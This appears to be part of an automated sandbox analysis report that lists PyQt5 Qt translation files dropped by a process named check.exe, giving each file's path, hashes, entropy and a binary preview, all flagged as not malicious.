Preview:	<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_hu.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.6255640074603277
Encrypted:	false
SSDEEP:	3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
MD5:	5A46979B45C67DD6312F33CCEA2ED7BC
SHA1:	4C56836B1FB10D9903B299CBCB925947D515B4C8
SHA-256:	BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
SHA-512:	BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_it.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	153
Entropy (8bit):	3.5752972123113778
Encrypted:	false
SSDEEP:	3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
MD5:	2BB8C94D420D3BC344C79A01043BDC89
SHA1:	3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
SHA-256:	9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
SHA-512:	C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_ja.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.599979504080125
Encrypted:	false
SSDEEP:	3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
MD5:	8A1EE3433304838CCD0EBE0A825E84D8
SHA1:	2B3476588350C5384E0F9A51FF2E3659E89B4846
SHA-256:	23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
SHA-512:	2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_ko.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	146
Entropy (8bit):	3.652277257665055
Encrypted:	false
SSDEEP:	3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
MD5:	7B2659AF52B824EAC6C169CDD9467EE9
SHA1:	5727109218B222E3B654A8CC9933E970EB7C2118
SHA-256:	4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
SHA-512:	E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_lt.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	165383
Entropy (8bit):	4.805977227348512
Encrypted:	false
SSDEEP:	1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
MD5:	8992B652D1499F5D2F12674F3F875A35
SHA1:	E22766A49612F79156C550D83C6C230345DDA433
SHA-256:	47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
SHA-512:	9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ltB..0X.....)C...+...\|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E......................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...\|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_lv.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	89
Entropy (8bit):	4.156834975253888
Encrypted:	false
SSDEEP:	3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
MD5:	19F1B919BB531E9E12E7F707BEBD8497
SHA1:	46E82683CEA28D877C73A5CE02F965BB1130FC62
SHA-256:	03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
SHA-512:	901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_pl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	161
Entropy (8bit):	3.8693516202048612
Encrypted:	false
SSDEEP:	3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
MD5:	D71EA9FEFD97464B178235150EC8759E
SHA1:	61026FE602FD1B8B442A0D341C6BD759EEC75488
SHA-256:	BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
SHA-512:	ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_pt.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	70334
Entropy (8bit):	4.732724622610353
Encrypted:	false
SSDEEP:	768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
MD5:	6656500F7A28EF820AE9F97FD47FB5BB
SHA1:	CC112B9C9513BCF7497F3417168B4C8A9F7640A9
SHA-256:	2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
SHA-512:	5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......pt_PTB...(......9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..\|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...\|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,..y......y..o...y......T..L...0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_ru.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	164
Entropy (8bit):	3.984562388316898
Encrypted:	false
SSDEEP:	3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
MD5:	F7A8C75408B9A34A2B185E76F51B7B85
SHA1:	065E987139C5FB809A6F9CDF3845BCD79707FDBB
SHA-256:	6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
SHA-512:	E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_sk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	157
Entropy (8bit):	3.7731953311404336
Encrypted:	false
SSDEEP:	3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
MD5:	24C179481B5EF574F33E983A62A34D53
SHA1:	0A67F1ED8CA4A5182F504806F8D47D499789F2D2
SHA-256:	B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
SHA-512:	4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_sl.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	228428
Entropy (8bit):	4.726953418955661
Encrypted:	false
SSDEEP:	3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
MD5:	D35A0FE35476BE8BD149CEE46E42B5E9
SHA1:	9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
SHA-256:	C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
SHA-512:	BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_sv.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	65851
Entropy (8bit):	4.7906769989650515
Encrypted:	false
SSDEEP:	1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
MD5:	0E85E0E0E7DDFE3D4BDE302F27047F9C
SHA1:	AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
SHA-256:	4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
SHA-512:	8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`...B..............+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,.................i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y......y.../..y..h...y......T..J...0..'[..0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_tr.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	110
Entropy (8bit):	3.630483009136986
Encrypted:	false
SSDEEP:	3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
MD5:	16CDF5B9D48B0F795D532A0D07F5C3A0
SHA1:	6E403C9096B3051973E2B681DFEBBC8DD024830D
SHA-256:	F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
SHA-512:	36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_uk.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	164
Entropy (8bit):	4.021402900389864
Encrypted:	false
SSDEEP:	3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
MD5:	9B101363343847FE42167183320C03F0
SHA1:	F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
SHA-256:	F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
SHA-512:	DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_zh_CN.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	117347
Entropy (8bit):	5.8593733369029195
Encrypted:	false
SSDEEP:	1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
MD5:	0D02F0DE5A12BCB338B7042DFBDAACF3
SHA1:	B7C10D249D8986AD8C6939B370407D07227A39F5
SHA-256:	28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
SHA-512:	21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zhB..+...........+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...\|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`..............................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qt_zh_TW.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	141
Entropy (8bit):	3.7198292994386235
Encrypted:	false
SSDEEP:	3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
MD5:	ED4135D705AEF3D97F8BF6B8FF11F09C
SHA1:	308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
SHA-256:	751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
SHA-512:	B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......zh_TW....n.....q.t.b.a.s.e._.z.h._.T.W...$.q.t.m.u.l.t.i.m.e.d.i.a._.z.h._.T.W...&.q.t.x.m.l.p.a.t.t.e.r.n.s._.z.h._.T.W

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qtbase_ar.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	160017
Entropy (8bit):	5.35627970915292
Encrypted:	false
SSDEEP:	1536:XGlAMfkX1M0RdaCkR8lfv8vtc8EFrVYA2I4AJZWEWgHg1C8COvzHKHC6Jp9NV0V7:XUr0RACkIwDEpV1Lgf1ubtw3Bb
MD5:	A7E4D0BA0FC5DF07F62CC66EC9878979
SHA1:	21FD131B23BDD1BBA7BBB86F3ED5C83876F45638
SHA-256:	E03FE68D83201543698FD7FE267DD5DFC5BFD195147E74FF2F19AC3491401263
SHA-512:	D9E6B10506FCF20B5B783F011908083D9DF6C5DF88E21B10D07F53A01AD6506A4B921C85335A25BAE54E27BAD7D01B6E240D58FDEEAABC7FF32014EC120C2ECF
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......arB..2....*.......+.......@.......A.......B..._...C......D.......E......F.......G... ...H...D...I...h...P...C...Q...g...R......S.......T.......U.......V...x...W......X.......Y.......]..'=...s......t...........]...........;..'....;..(....;.......;.......M..'e...O.......O...9...........}..'........C...=......m..'....t..........!o..(5...Z..+;..5u..+;..c...+O......1...!...D@...8..E@.....H4...,..HY..QI..H.......IC......J....1..J.......J.......LD......L.......PS......QR...R..R...V2..T.......U....]..X.......Zr.....[`......\....t..]x......_......._.......yg......1...6....E..8V..............C............................$..RN...[...0...,.......y.......y...................K...........9..R....E.."............z.......................%..F;...D...[..................................!....5.......0...I...0.......0...5...0..#....5.......5...p..............W}.. D..(... D..P=..+.......<U......<U......<.......H5..(...H5..P...L.......VE......VE......V....B..f...JJ..f.......f.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qtbase_bg.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	165337
Entropy (8bit):	5.332219158085151
Encrypted:	false
SSDEEP:	1536:9ULiyUxPoT6qx+J7FJlaaMJnxjqxq+0Uiff0mbVeb7wiEwYuYqDKBkKHMXHCIMll:9ULpIVFnpwUiEujw27ncUQUz
MD5:	660413AD666A6B31A1ACF8F216781D6E
SHA1:	654409CDF3F551555957D3DBCF8D6A0D8F03A6C5
SHA-256:	E448AC9E3F16C29EB27AF3012EFE21052DAA78FABFB34CD6DFF2F69EE3BD3CDB
SHA-512:	C6AE4B784C3D302D7EC6B9CE7B27DDAF00713ADF233F1246CD0475697A59C84D6A86BAA1005283B1F89FCC0835FD131E5CF07B3534B66A0A0AA6AC6356006B8F
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......bg_BGB../......,....+..."...@...]...A.......B.......C.......D...P...E...!...F.......G.......H.......I.......P.......Q.......R...A...S...e...T.......U.......V.......W...1...X...U...Y...y...]..,....s...,...t...................P...;..+....;..-E...;..!....;..+....M..,Y...O...,...O..............}..,............=...Q...m..,....t...\|......>...(5..1...+;..<...+;..o...+O...r..1...>...D@......E@......H4......HY..[...H.......IC......J....E..J....X..J.......LD......L....L..PS......QR.."...R...`...T....X..U.......X.......Zr...q..[`...`..\.......]x......_......._....T..yg.....1...=....E..?...............L(.......(...............'...$..\....[.......,...I...y...!...y...................S...........9..]%...E..5p...........z..!q...................%..O....D..................D.....8......:......?....5...&...0.......0.. ....0...c...0..5....5.......5..................b:.. D..-... D..Z...+.......<U......<U...0..<.......H5..-...H5..[...L.......VE..#a..VE..;...V.......f...T...f...!..

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qtbase_ca.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	210159
Entropy (8bit):	4.666388181115542
Encrypted:	false
SSDEEP:	3072:P/DVhdlafzvZfeW+6kXEVjSVPzC3ceKdP2:xYf7UW+WjwP2
MD5:	B383F6D4B9EEA51C065E73ECB95BBD23
SHA1:	DD6C2C4B4888B0D14CEBFC86F471D0FC9B07FE42
SHA-256:	52E94FCC9490889B55812C5433D009B44BDC2DC3170EB55B1AF444EF4AAE1D7F
SHA-512:	9401940A170E22CE6515E3C1453C563D93869A3C3686C859491A1F8795520B61BF3F0BFE4687A7380C0CC0C75E25559354FDB5CEF916AF4C5B6CD9661464A54A
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......caB..7....*.......+.../...@..:P...A..:t...B..:....C..:....D..;=...E..<....F..<Z...G..<~...H..<....I..<....P..>....Q..>....R..?....S..?R...T..?v...U..?....V..?....W..@....X..@<...Y..@`...]../....s..1....t..........2s......#p...;.......;../....;..W....;..e+...M../3...O.......O..9.......J....}../]......8....=..9....m../....t..9Y.......S..(5..lB..+;.._...+;...=..+O..U...1.......D@..:...E@..?...H4...J..HY..~...H..."...IC...0..J....W..J....0..J.......LD..!...L...!f..PS..)...QR.."...R.......T...9~..U...9...U...z...X...>...Zr..E...[`...e..\...LD..]x..7U.._......._...M...yg..f...1...a....E..c....7.........U.......p........b.......4.......K...$.......[.......,.......y.......y...................^...........9...:...E...s...... (...z..":.......d......!....%..tQ...D.."......."......2......ve.....y...........5..#H...0...\...0..W+...0..';...0.......5..(....5..........)s.......... D..0w.. D..}...+...1...<?..5x..<U......<U..5...<...6@..H5..0...H5..~...L...9...VE..$...V...SV..f.

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qtbase_cs.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	174701
Entropy (8bit):	4.87192387061682
Encrypted:	false
SSDEEP:	3072:5WjuhX0CVRaakGjW9E8SSOQfX/JlwVOMxrboRPqWxXfQvO7zjBf:5iFGj1QfXr8Gd
MD5:	C57D0DE9D8458A5BEB2114E47B0FDE47
SHA1:	3A0E777539C51BB65EE76B8E1D8DCE4386CBC886
SHA-256:	03028B42DF5479270371E4C3BDC7DF2F56CBBE6DDA956A2864AC6F6415861FE8
SHA-512:	F7970C132064407752C3D42705376FE04FACAFD2CFE1021E615182555F7BA82E7970EDF5D14359F9D5CA69D4D570AA9DDC46D48CE787CFF13D305341A3E4AF79
Malicious:	false
Reputation:	unknown
Preview:	<.d....!..`.......cs_CZB..3p.....F....+.......@..!....@..Ef...A..!....A..E....B.."1...B..E....C.."U...C..E....D.."....D..F....E..#p...E..F)...F..#....F..FP...G..#....G..Fw...H..$....H..F....I..$6...I..F....P..&%...P..Gr...Q..&I...Q..G....R..&....R..G....S..&....S..H....T..&....T..H8...U..'....U..H_...V..'Z...V..H....W..'~...W..H....X..'....X..H....Y..'....Y..H....]..,....]..,....s.......t...9..................;.......;..+....;..1B...;......;..?x...;..N....;..iY...;..s3...M..,B...M..,....O.......O...w...O..rr...........}..,j...}..-....... 5...=.. ....m..,....m..-8...t.. .......ay..(5..TT..+;...A..+;..B...+;..u...+O......+O..=a..1...a...D@.."...E@..&m..E@..G...F...J...H4...=..HY..`...H.......I...J...IC......J....-..J.......J.......LD......L....(..PS.....QR.."S..R...e...T.... ..U......X.......Zr...g..[`......\......]x......_......._......._...v...yg......1...C....E..E...............=.......Q........................s...$..a....[.......,.......y.......y...y..............G..........

C:\Users\user\AppData\Local\Temp\_MEI55962\PyQt5\Qt5\translations\qtbase_da.qm

Download File

Process:	C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	181387
Entropy (8bit):	4.755193800761075
Encrypted:	false
